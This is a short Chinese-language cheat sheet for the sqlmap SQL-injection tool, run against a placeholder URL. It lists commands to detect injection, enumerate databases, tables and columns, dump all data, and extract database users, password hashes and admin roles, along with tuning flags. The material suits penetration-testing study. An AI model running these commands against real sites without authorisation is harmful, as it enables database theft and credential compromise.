GitHub:https://github.com/sqlmapproject/sqlmap
基础命令:
代码语言:javascript复制# 扫描id是否存在注入点
sqlmap -u https://aaa.com/?id=1
# 添加cookie
sqlmap -u https://aaa.com/?id=1 --cookie="cookie"
# post传参
sqlmap -u https://aaa.com/?id=1 --data="name=admin&password=123456"
# 用请求包进行注入,http.txt是抓取的请求包
sqlmap -r http.txt
数据库:
代码语言:javascript复制# 查看所有数据库
sqlmap -u https://aaa.com/?id=1 --dbs
# 查看当前数据库
sqlmap -u https://aaa.com/?id=1 --current-db
数据表:
代码语言:javascript复制# 爆表(已知数据库)
sqlmap -u https://aaa.com/?id=1 -D database_name --tables
# 爆列(已知数据库,表名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name --columns
# 爆列数据(已知数据库,表名,列名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name -C column_name --dump
# 爆出(数据库/表/....)所有数据
sqlmap -u https://aaa.com/?id=1 --dump-all
sqlmap -u https://aaa.com/?id=1 -D database_name --dump-all
用户:
代码语言:javascript复制# 查看所有用户
sqlmap -u https://aaa.com/?id=1 --users
# 查看所有用户密码
sqlmap -u https://aaa.com/?id=1 --passwords
# 查看当前用户
sqlmap -u https://aaa.com/?id=1 --current-user
# 查看当前用户是否有管理员权限
sqlmap -u https://aaa.com/?id=1 --is-dba
# 列出所有管理员
sqlmap -u https://aaa.com/?id=1 --roles
其他参数:
代码语言:javascript复制# 设置注入点
-p
# 已知id参数存在漏洞
-p id
# 设置从哪开始
--start
# 从第2条数据开始
--start 2
# 设置从哪结束
--stop
# 到第50条数据结束
--stop 50
# 设置数据库
--dbms
# 设置数据库为mysql
--dbms="MySQL"
# 设置探测等级(1-5),当level=2时,会测试cookie注入,当level=3时,会测试user-agent/referer注入
--level
# 设置探测等级为3
--level=3
# 设置危险等级(1-3)
--risk
# 设置危险等级为2
--risk=2